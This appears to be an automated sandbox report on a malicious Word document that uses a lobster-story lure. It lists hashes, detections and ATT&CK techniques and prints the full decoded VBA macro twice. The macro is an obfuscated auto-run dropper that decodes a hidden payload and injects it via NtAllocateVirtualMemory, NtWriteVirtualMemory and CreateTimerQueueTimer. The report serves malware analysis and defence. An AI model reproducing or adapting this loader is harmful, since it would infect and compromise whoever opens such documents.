Office (OLE) malware analysis — malicious · 0858582ca7d96c7d

MALICIOUS

Office (OLE)

236.0 KB Created: 2017-08-01 23:33:00 Authoring application: Microsoft Office Word First seen: 2017-08-08

MD5: e6e768121099102c8e7a6b7f8bf271e2 SHA-1: 0219a5226612f811b2f2bb78d098cb4cb71b09a8 SHA-256: 0858582ca7d96c7d588cd83f2ef4cb94fcef2e6f70fdb0d022dbceb63a1c9ccc

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'Doc.Dropper.Agent-6337050-0' heuristics. The document body presents a narrative about a talking lobster, which serves as a lure. The VBA macro, although heavily obfuscated, is likely responsible for executing malicious actions, potentially downloading and running a second-stage payload. The presence of a Document_Open macro suggests automatic execution upon opening.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6337050-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6337050-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim hallow As Integer
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12735 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12735 bytes
SHA-256: `adf3395cf06caae98fee1a817afda098d7852c6180ea430cdb25cee605c05b8c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub cothurnus() Dim anarchist As Byte Dim confession As String sadden.endamage.Value = Day(#12/5/2013#) varday = baldachino = "abasia" particulars = "barbuda" picked = "erewhile" rainy = "cowpens" sounding = "lir" hydrocarbon = damascus attrited = "effortlessly" handover = "precursor" Set calluna = sadden.endamage.SelectedItem cathode = 67 restrictive = 2086 pertusion = 480783 Pmt 0, cathode, 36647, 33477, 4 oder = calluna.Name bombard = 7844 lasagna = Right(oder, bombard) floats = catalectic.bandoleer(lasagna) rabid = 64 scath = 34877 canicula = 179544 Pmt 0, rabid, 30046, 10076, 5 ostrogoth = "semiliterate" #If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then Dim nautilus As Long Dim extenuating As LongPtr Dim squaretoed As LongPtr Dim wellfed As String #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then Dim preshow As Long Dim squaretoed As Long Dim nominated As Long Dim extenuating As Long #End If catostomidae = 14 - 241 + 227 subtilization = "arminian" battleax = 4096 ayudante = 103 augmentation = 13436 uncritical = 386789 Pmt 0, ayudante, 16176, 26463, 3 sightless = "tremellaceae" Arrange = "mainstreamed" pikeperch = "dasypodidae" banished = monotonous battleful = 68 enemy = 20489 mailsorter = 529276 Pmt 0, battleful, 14071, 41127, 8 prate = floats afghanistan = clough annotation = "peg" extenuating = supposition(prate) adenine = "cretinism" narrowmindedness = "posthumously" #If (6 * 3 + 5) > (7 - 2 * 1) And Win64 > (48 - 6 * 8) * 2 Then Dim casque As Variant Dim noncontent As LongPtr Dim elastomer As LongPtr Dim actually As LongPtr elegy = 22 - 152 + 2194 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then Dim noncontent As Long fanlike = 44 + 737 Dim elastomer As Long Dim actually As Long elegy = fanlike + 3459 #End If Dim bundle As Variant Dim spontaneously As Byte noncontent = 0 squaretoed = extenuating + elegy elastomer = 201527 actually = 34 + 74 + 3392 sharpener = tael(elastomer, noncontent, squaretoed, noncontent, noncontent, noncontent, noncontent) stow = 119 blathering = 8821 bickerstaff = 515573 Pmt 0, stow, 10328, 36975, 2 End Sub Private Sub Document_Open() Dim hallow As Integer Dim clipboard As Integer amoebean = coarse cothurnus consumption = 86 attenuated = 2416 huckster = 498194 Pmt 0, consumption, 3508, 17165, 8 End Sub Function supposition(hornfels) Dim crossbred As Variant Dim deerstalking As Integer Dim wisdom As String #If (7 * 4 + 5) > (7 - 2 * 1) And Win64 > (20 - 5 * 4) * 2 Then Dim bigotry As Byte Dim boxwood As LongPtr silkscreen = 12 - 4 Dim memo As LongPtr Dim misrepresent As Long Dim biaxial As Integer Dim preoccupation As LongPtr Dim arrish As Long #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then Dim boxwood As Long silkscreen = 197 + 36 - 229 Dim memo As Long Dim preoccupation As Long #End If fregatidae = VarPtr(boxwood) interfacial = coggery(fregatidae, VarPtr(hornfels) + 8, silkscreen) cline = -1 memo = 96 - 96 coordinator = 20 - 82 + 62 preoccupation = 9761 hornets = 95 + 49 + 3952 evenness = 64 drygoods = cannabis(ByVal cline, memo, ByVal coordinator, preoccupation, ByVal hornets, ByVal evenness) centunculus = centunculus matchbox = Math.Round(268) coggery memo, boxwood, 5883 athetosis = 13 expending = 22850 homoerotic = 461069 Pmt 0, athetosis, 29510, 33595, 5 supposition = memo End Function Function coggery(describable, adhibition, hepatitis) #If (3 * 4 + 5) > (5 - 2 * 1) And Win64 > (8 - 4 * 2) * 2 Then Dim locomotion As String Dim prescious As Variant Dim auditorium As LongPtr Dim inimical As LongPtr Dim hollandaise As LongPtr Dim anhedonia As Integer Dim sarcostemma As LongPtr Dim exploded As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then Dim inimical As Long Dim soit As Variant Dim auditorium As Long Dim tibicen As Variant Dim sarcostemma As Long Dim screaming As Variant Dim hollandaise As Long Dim homoerotic As String Dim exploded As Long Dim mugient As Byte Dim nuture As Byte #End If matchbox = Fix(378) epilepsy = "truant" inimical = describable exploded = hepatitis centunculus = centunculus sarcostemma = adhibition flammae = 25 exist = 33293 abronia = 461481 Pmt 0, flammae, 22212, 47908, 2 centunculus = "heddle" auditorium = 126 + 62 - 189 keurboom ByVal auditorium, inimical, sarcostemma, exploded, hollandaise epilepsy = "bemoan" End Function Sub zoom() With Documents("Sample.doc").Windows(1).View .Type = wdPrintView With .zoom .PageColumns = 3 .PageRows = 2 End With End With End Sub Attribute VB_Name = "catalectic" ' Knew it was gonna be a long night ' I was doing alright ' We locked eyes over whiskey on ice #If (16 / 4 + 2) > (7 - 2 * 1) And Not (32 / 8 - 1 * 4) * 2 < Win64 Then ' And hit me like a hurricane Public Declare Function dowry Lib "Ntdll.dll " Alias "AcquireSRWLockShared" (asphyxiating As Any) As Long ' The moon went hiding, stars quit shining ' And walked out Public Declare Function cannabis Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (actinomycin As Long, stockcar As Long, ByVal flirt As Long, avaramByVal As Long, gnashing As Long, ByVal sheeptick As Long) As Long ' I wouldnt be in my truck ' Knew it was gonna be a long night Public Declare Function kinfolk Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal contemporation As Any, brassia As Any, misericordiam As Any, cordaitales As Any) As Long ' Rain was driving, thunder, lightning ' And hit me like a hurricane Public Declare Function tael Lib "Kernel32" Alias "CreateTimerQueueTimer" (submerge As Any, ByVal blebbed As Any, ByVal balneal As Any, ByVal dugout As Any, ByVal restful As Any, ByVal fastener As Any, ByVal ben As Any) As Long ' I was doing alright ' I wouldnt be in my truck Public Declare Function keurboom Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal strongsmelling As Any, ByVal astrophysicist As Any, ByVal windblown As Any, ByVal untidy As Any, ByVal hartebeest As Any) As Long ' I was doing alright ' The moon went hiding, stars quit shining #End If ' From the moment when ' If I woulda just layed my drink down #If (12 / 4 + 5) > (7 - 2 * 1) And Win64 > (15 - 5 * 3) * 2 Then ' And hit me like a hurricane ' Rain was driving, thunder, lightning Public Declare PtrSafe Function keurboom Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal assimilable As Any, ByVal gomashta As Any, ByVal poles As Any, ByVal numerable As Any, ByVal airstream As Any) As LongPtr ' Started talking bout us again ' And walked out Public Declare PtrSafe Function twineth Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal arborary As Any, berkeley As Any, brazenly As Any, bouyei As Any) As LongPtr ' Then you rolled in with your hair in the wind ' Hit me like a hurricane Public Declare PtrSafe Function holdover Lib "ntdll.dll " Alias "NtCreateEventPair" (piecemeal As LongPtr, burrheaded As LongPtr, jibboom As LongPtr) As LongPtr ' But just your sight had my heart storming ' But just your sight had my heart storming Public Declare PtrSafe Function astrometry Lib "ntdll.dll " Alias "AcquireSRWLockShared" (confessional As Any) As LongPtr ' But just your sight had my heart storming ' Rain was driving, thunder, lightning Public Declare PtrSafe Function tael Lib "Kernel32" Alias "CreateTimerQueueTimer" (exportable As Any, ByVal cynanche As Any, ByVal formalist As Any, ByVal absolver As Any, ByVal delphi As Any, ByVal considered As Any, ByVal megadermatidae As Any) As Long ' The moon went hiding, stars quit shining ' But just your sight had my heart storming Public Declare PtrSafe Function cannabis Lib "ntdll.dll " Alias _ "NtAllocateVirtualMemory" (endometrial As LongPtr, accidentalness As LongPtr, ByVal macroscopically As LongPtr, anticlimacticByVal As LongPtr, berate As LongPtr, ByVal immunofluorescence As LongPtr) As LongPtr ' Knew it was gonna be a long night ' If I woulda just layed my drink down #End If ' Driving us to your house ' The moon went hiding, stars quit shining Function bandoleer(foreground) As String Dim incommode As Variant Dim antefix As Long Dim aerobe(63) As Long Dim buchloe() As Byte Dim personable As Long Dim than As Integer Dim firstclass As String Dim slowdown(63) As Long epilepsy = "agelessness" Dim healthfulness As Byte Dim unconfident(63) As Long clairvoyant = gaberlunzie / 340 Dim psilophytaceae As Long Dim naughty As Long Dim curiousness(6962) As Byte Dim referee As Long Dim forbid As Integer centunculus = epilepsy claiming = 64 metage = 256 brevis = 53 - 15 + 262106 eighty = 63 geraniaceae = 255 carbuncled = 16711680 biograph = 52 + 257996 arales = 65280 Dim elmos As Variant Dim flux As String chaqueta = 65536 bise = 28 - 77 + 4081 house = 57 + 4039 amentes = 63 + 25 + 16514984 Dim blowfly As Variant Dim psophia As Byte guilty = 0 erogenous = 7843 Dim mimosoideae() As Byte Dim pokerish As Byte Dim eliomys As String mimosoideae = VBA.StrConv(foreground, 128) Dim degradation As Byte jackal = 40 victoriously = 36961 wedlock = 595163 VBA.Financial.Pmt 0, jackal, 26970, 25307, 2 pythoninae = 7843 bulbar = vbKeyShift - 12 For dilleniidae = 0 To pythoninae If dilleniidae Mod 2 = 0 Then mimosoideae(dilleniidae) = mimosoideae(dilleniidae) - bulbar Else mimosoideae(dilleniidae) = mimosoideae(dilleniidae) - (bulbar - 1) End If Next dilleniidae centurial = 110 flower = 29604 simulcast = 579874 VBA.Financial.Pmt 0, centurial, 14803, 22040, 2 than = 0 dishonorableness = 0 samaritan = 107 - 83 + 19 moneymaking = cavia For referee = (7 - 7) * 1 To (50 + 13) * (5 - 4) unconfident(referee) = angiologist(referee, claiming, 43) aerobe(referee) = angiologist(referee, house, 43) slowdown(referee) = angiologist(referee, brevis, 43) Next referee decreased = 7 bigram = 7712 degrading = 228738 VBA.Financial.Pmt 0, decreased, 18467, 54400, 6 buchloe = mimosoideae durance = 70 + 158 - 224 motorcycling = 7 moneybag = 2815 liana = 251779 VBA.Financial.Pmt 0, motorcycling, 25097, 37666, 6 nuncupative = 3 centunculus = "impossibly" centunculus = "tortoise" bizarrerie = nuncupative + 1 antiaircraft = 2 For psilophytaceae = 0 To pythoninae hardofhearing = buchloe(psilophytaceae) singaporean = buchloe(psilophytaceae + 2) chaste = aerobe(moneymaking(buchloe(psilophytaceae + 1))) closeness = unconfident(moneymaking(singaporean)) + moneymaking(buchloe(psilophytaceae + nuncupative)) personable = slowdown(moneymaking(hardofhearing)) + chaste + closeness referee = angiologist(personable, carbuncled, 35) curiousness(antefix) = angiologist(referee, chaqueta, 25) referee = angiologist(personable, arales, 35) curiousness(antefix + 1) = angiologist(referee, metage, 25) curiousness(antefix + antiaircraft) = angiologist(personable, geraniaceae, 35) antefix = antefix + antiaircraft + 1 psilophytaceae = psilophytaceae + 3 Next bandoleer = curiousness End Function Function angiologist(ban, mynheer, graze) Select Case graze Case (5 * 5) + (10 / 2 - 5) angiologist = ban \ mynheer Case (5 * 7) + (5 - 3) / 2 - 1 angiologist = ban And mynheer Case (40 + 3) + (56 / 7 - 4 * 2) angiologist = ban * mynheer End Select End Function Function cavia() Dim susurration(255) As Byte basket = 126 - 104 + 43 Do susurration(basket) = basket - 65 basket = basket + 1 Loop While basket <= 90 + 1 basket = 48 Do susurration(basket) = basket + 4 basket = basket + 1 Loop While basket <= 50 + 8 basket = 97 Do susurration(basket) = basket - 71 basket = basket + 1 Loop While basket <= 120 + 3 susurration(47) = 63 basket = 43 susurration(basket) = 60 + 2 cavia = susurration End Function Function clarion(cuckoo) clarion = AscW(cuckoo) End Function Attribute VB_Name = "sadden" Attribute VB_Base = "0{A8CD2D17-F177-49C6-A675-509D0E11F8B5}{33A3C4A6-6EA1-4CC7-9076-BB74C63EFCEB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: adf3395cf06caae98fee1a817afda098d7852c6180ea430cdb25cee605c05b8c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Sub cothurnus()
Dim anarchist As Byte
Dim confession As String
sadden.endamage.Value = Day(#12/5/2013#)
varday = baldachino = "abasia"
particulars = "barbuda"
picked = "erewhile"
rainy = "cowpens"
sounding = "lir"

hydrocarbon = damascus
attrited = "effortlessly"
handover = "precursor"
Set calluna = sadden.endamage.SelectedItem
cathode = 67
restrictive = 2086
pertusion = 480783
 Pmt 0, cathode, 36647, 33477, 4

oder = calluna.Name
bombard = 7844
lasagna = Right(oder, bombard)
floats = catalectic.bandoleer(lasagna)
rabid = 64
scath = 34877
canicula = 179544
 Pmt 0, rabid, 30046, 10076, 5

ostrogoth = "semiliterate"
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
Dim nautilus As Long
Dim extenuating As LongPtr
Dim squaretoed As LongPtr
Dim wellfed As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim preshow As Long
Dim squaretoed As Long
Dim nominated As Long
Dim extenuating As Long
#End If
catostomidae = 14 - 241 + 227
subtilization = "arminian"
battleax = 4096
ayudante = 103
augmentation = 13436
uncritical = 386789
 Pmt 0, ayudante, 16176, 26463, 3

sightless = "tremellaceae"
Arrange = "mainstreamed"
pikeperch = "dasypodidae"
banished = monotonous
battleful = 68
enemy = 20489
mailsorter = 529276
 Pmt 0, battleful, 14071, 41127, 8

prate = floats
afghanistan = clough
annotation = "peg"
extenuating = supposition(prate)
adenine = "cretinism"
narrowmindedness = "posthumously"
#If (6 * 3 + 5) > (7 - 2 * 1) And Win64 > (48 - 6 * 8) * 2 Then
Dim casque As Variant
Dim noncontent As LongPtr
Dim elastomer As LongPtr
Dim actually As LongPtr
elegy = 22 - 152 + 2194
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim noncontent As Long
fanlike = 44 + 737
Dim elastomer As Long
Dim actually As Long
elegy = fanlike + 3459

#End If
Dim bundle As Variant
Dim spontaneously As Byte
noncontent = 0
squaretoed = extenuating + elegy
elastomer = 201527
actually = 34 + 74 + 3392
sharpener = tael(elastomer, noncontent, squaretoed, noncontent, noncontent, noncontent, noncontent)
stow = 119
blathering = 8821
bickerstaff = 515573
 Pmt 0, stow, 10328, 36975, 2

End Sub

Private Sub Document_Open()
Dim hallow As Integer
Dim clipboard As Integer
amoebean = coarse
cothurnus
consumption = 86
attenuated = 2416
huckster = 498194
 Pmt 0, consumption, 3508, 17165, 8
End Sub

Function supposition(hornfels)
Dim crossbred As Variant
Dim deerstalking As Integer
Dim wisdom As String
#If (7 * 4 + 5) > (7 - 2 * 1) And Win64 > (20 - 5 * 4) * 2 Then
Dim bigotry As Byte
Dim boxwood As LongPtr
silkscreen = 12 - 4
Dim memo As LongPtr
Dim misrepresent As Long
Dim biaxial As Integer
Dim preoccupation As LongPtr
Dim arrish As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim boxwood As Long
silkscreen = 197 + 36 - 229
Dim memo As Long
Dim preoccupation As Long
#End If
fregatidae = VarPtr(boxwood)
interfacial = coggery(fregatidae, VarPtr(hornfels) + 8, silkscreen)
cline = -1
memo = 96 - 96
coordinator = 20 - 82 + 62
preoccupation = 9761
hornets = 95 + 49 + 3952
evenness = 64
drygoods = cannabis(ByVal cline, memo, ByVal coordinator, preoccupation, ByVal hornets, ByVal evenness)
centunculus = centunculus

matchbox = Math.Round(268)

coggery memo, boxwood, 5883
athetosis = 13
expending = 22850
homoerotic = 461069
 Pmt 0, athetosis, 29510, 33595, 5

supposition = memo
End Function
Function coggery(describable, adhibition, hepatitis)
#If (3 * 4 + 5) > (5 - 2 * 1) And Win64 > (8 - 4 * 2) * 2 Then
Dim locomotion As String
Dim prescious As Variant
Dim auditorium As LongPtr
Dim inimical As LongPtr
Dim hollandaise As LongPtr
Dim anhedonia As Integer
Dim sarcostemma As LongPtr
Dim exploded As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim inimical As Long
Dim soit As Variant
Dim auditorium As Long
Dim tibicen As Variant
Dim sarcostemma As Long
Dim screaming As Variant
Dim hollandaise As Long
Dim homoerotic As String
Dim exploded As Long
Dim mugient As Byte
Dim nuture As Byte
#End If
matchbox = Fix(378)
epilepsy = "truant"
inimical = describable
exploded = hepatitis
centunculus = centunculus
sarcostemma = adhibition
flammae = 25
exist = 33293
abronia = 461481
 Pmt 0, flammae, 22212, 47908, 2

centunculus = "heddle"
auditorium = 126 + 62 - 189
keurboom ByVal auditorium, inimical, sarcostemma, exploded, hollandaise
epilepsy = "bemoan"
End Function
Sub zoom()
    With Documents("Sample.doc").Windows(1).View
        .Type = wdPrintView
        With .zoom
            .PageColumns = 3
            .PageRows = 2
        End With
    End With
End Sub



Attribute VB_Name = "catalectic"
'  Knew it was gonna be a long night
'  I was doing alright
'  We locked eyes over whiskey on ice
#If (16 / 4 + 2) > (7 - 2 * 1) And Not (32 / 8 - 1 * 4) * 2 < Win64 Then
'  And hit me like a hurricane
Public Declare Function dowry Lib "Ntdll.dll  " Alias "AcquireSRWLockShared" (asphyxiating As Any) As Long
'  The moon went hiding, stars quit shining
'  And walked out
Public Declare Function cannabis Lib "Ntdll.dll  " Alias _
       "NtAllocateVirtualMemory" (actinomycin As Long, stockcar As Long, ByVal flirt As Long, avaramByVal As Long, gnashing As Long, ByVal sheeptick As Long) As Long
'  I wouldnt be in my truck
'  Knew it was gonna be a long night
Public Declare Function kinfolk Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal contemporation As Any, brassia As Any, misericordiam As Any, cordaitales As Any) As Long
'  Rain was driving, thunder, lightning
'  And hit me like a hurricane
Public Declare Function tael Lib "Kernel32" Alias "CreateTimerQueueTimer" (submerge As Any, ByVal blebbed As Any, ByVal balneal As Any, ByVal dugout As Any, ByVal restful As Any, ByVal fastener As Any, ByVal ben As Any) As Long
'  I was doing alright
'  I wouldnt be in my truck
Public Declare Function keurboom Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal strongsmelling As Any, ByVal astrophysicist As Any, ByVal windblown As Any, ByVal untidy As Any, ByVal hartebeest As Any) As Long
'  I was doing alright
'  The moon went hiding, stars quit shining
#End If
'  From the moment when
'  If I woulda just layed my drink down
#If (12 / 4 + 5) > (7 - 2 * 1) And Win64 > (15 - 5 * 3) * 2 Then
'  And hit me like a hurricane
'  Rain was driving, thunder, lightning
Public Declare PtrSafe Function keurboom Lib "ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal assimilable As Any, ByVal gomashta As Any, ByVal poles As Any, ByVal numerable As Any, ByVal airstream As Any) As LongPtr
'  Started talking bout us again
'  And walked out
Public Declare PtrSafe Function twineth Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal arborary As Any, berkeley As Any, brazenly As Any, bouyei As Any) As LongPtr
'  Then you rolled in with your hair in the wind
'  Hit me like a hurricane
Public Declare PtrSafe Function holdover Lib "ntdll.dll  " Alias "NtCreateEventPair" (piecemeal As LongPtr, burrheaded As LongPtr, jibboom As LongPtr) As LongPtr
'  But just your sight had my heart storming
'  But just your sight had my heart storming
Public Declare PtrSafe Function astrometry Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (confessional As Any) As LongPtr
'  But just your sight had my heart storming
'  Rain was driving, thunder, lightning
Public Declare PtrSafe Function tael Lib "Kernel32" Alias "CreateTimerQueueTimer" (exportable As Any, ByVal cynanche As Any, ByVal formalist As Any, ByVal absolver As Any, ByVal delphi As Any, ByVal considered As Any, ByVal megadermatidae As Any) As Long
'  The moon went hiding, stars quit shining
'  But just your sight had my heart storming
Public Declare PtrSafe Function cannabis Lib "ntdll.dll  " Alias _
  "NtAllocateVirtualMemory" (endometrial As LongPtr, accidentalness As LongPtr, ByVal macroscopically As LongPtr, anticlimacticByVal As LongPtr, berate As LongPtr, ByVal immunofluorescence As LongPtr) As LongPtr
'  Knew it was gonna be a long night
'  If I woulda just layed my drink down
#End If

'  Driving us to your house
'  The moon went hiding, stars quit shining
Function bandoleer(foreground) As String
Dim incommode As Variant

Dim antefix As Long
Dim aerobe(63) As Long
Dim buchloe() As Byte
Dim personable As Long
Dim than As Integer
Dim firstclass As String
Dim slowdown(63) As Long
epilepsy = "agelessness"

Dim healthfulness As Byte

Dim unconfident(63) As Long
clairvoyant = gaberlunzie / 340

Dim psilophytaceae As Long
Dim naughty As Long

Dim curiousness(6962) As Byte
Dim referee As Long
Dim forbid As Integer

centunculus = epilepsy

claiming = 64
metage = 256
brevis = 53 - 15 + 262106
eighty = 63
geraniaceae = 255
carbuncled = 16711680
biograph = 52 + 257996
arales = 65280
Dim elmos As Variant

Dim flux As String

chaqueta = 65536
bise = 28 - 77 + 4081
house = 57 + 4039
amentes = 63 + 25 + 16514984
Dim blowfly As Variant

Dim psophia As Byte
guilty = 0
erogenous = 7843
Dim mimosoideae() As Byte
Dim pokerish As Byte
Dim eliomys As String
mimosoideae = VBA.StrConv(foreground, 128)
Dim degradation As Byte
jackal = 40
victoriously = 36961
wedlock = 595163
 VBA.Financial.Pmt 0, jackal, 26970, 25307, 2

pythoninae = 7843
bulbar = vbKeyShift - 12
For dilleniidae = 0 To pythoninae
If dilleniidae Mod 2 = 0 Then
mimosoideae(dilleniidae) = mimosoideae(dilleniidae) - bulbar
Else
mimosoideae(dilleniidae) = mimosoideae(dilleniidae) - (bulbar - 1)
End If
Next dilleniidae
centurial = 110
flower = 29604
simulcast = 579874
 VBA.Financial.Pmt 0, centurial, 14803, 22040, 2

than = 0
dishonorableness = 0
samaritan = 107 - 83 + 19
moneymaking = cavia
For referee = (7 - 7) * 1 To (50 + 13) * (5 - 4)
unconfident(referee) = angiologist(referee, claiming, 43)
aerobe(referee) = angiologist(referee, house, 43)
slowdown(referee) = angiologist(referee, brevis, 43)
Next referee
decreased = 7
bigram = 7712
degrading = 228738
 VBA.Financial.Pmt 0, decreased, 18467, 54400, 6

buchloe = mimosoideae
durance = 70 + 158 - 224
motorcycling = 7
moneybag = 2815
liana = 251779
 VBA.Financial.Pmt 0, motorcycling, 25097, 37666, 6

nuncupative = 3
centunculus = "impossibly"

centunculus = "tortoise"

bizarrerie = nuncupative + 1
antiaircraft = 2
For psilophytaceae = 0 To pythoninae
hardofhearing = buchloe(psilophytaceae)
singaporean = buchloe(psilophytaceae + 2)
chaste = aerobe(moneymaking(buchloe(psilophytaceae + 1)))
closeness = unconfident(moneymaking(singaporean)) + moneymaking(buchloe(psilophytaceae + nuncupative))
personable = slowdown(moneymaking(hardofhearing)) + chaste + closeness
referee = angiologist(personable, carbuncled, 35)
curiousness(antefix) = angiologist(referee, chaqueta, 25)
referee = angiologist(personable, arales, 35)
curiousness(antefix + 1) = angiologist(referee, metage, 25)
curiousness(antefix + antiaircraft) = angiologist(personable, geraniaceae, 35)
antefix = antefix + antiaircraft + 1
psilophytaceae = psilophytaceae + 3
Next
bandoleer = curiousness
End Function

Function angiologist(ban, mynheer, graze)
Select Case graze
Case (5 * 5) + (10 / 2 - 5)
angiologist = ban \ mynheer
Case (5 * 7) + (5 - 3) / 2 - 1
angiologist = ban And mynheer
Case (40 + 3) + (56 / 7 - 4 * 2)
angiologist = ban * mynheer
End Select
End Function
Function cavia()
Dim susurration(255) As Byte
basket = 126 - 104 + 43
Do
susurration(basket) = basket - 65
basket = basket + 1
Loop While basket <= 90 + 1
basket = 48
Do
susurration(basket) = basket + 4
basket = basket + 1
Loop While basket <= 50 + 8
basket = 97
Do
susurration(basket) = basket - 71
basket = basket + 1
Loop While basket <= 120 + 3
susurration(47) = 63
basket = 43
susurration(basket) = 60 + 2
cavia = susurration
End Function
Function clarion(cuckoo)
clarion = AscW(cuckoo)
End Function




Attribute VB_Name = "sadden"
Attribute VB_Base = "0{A8CD2D17-F177-49C6-A675-509D0E11F8B5}{33A3C4A6-6EA1-4CC7-9076-BB74C63EFCEB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.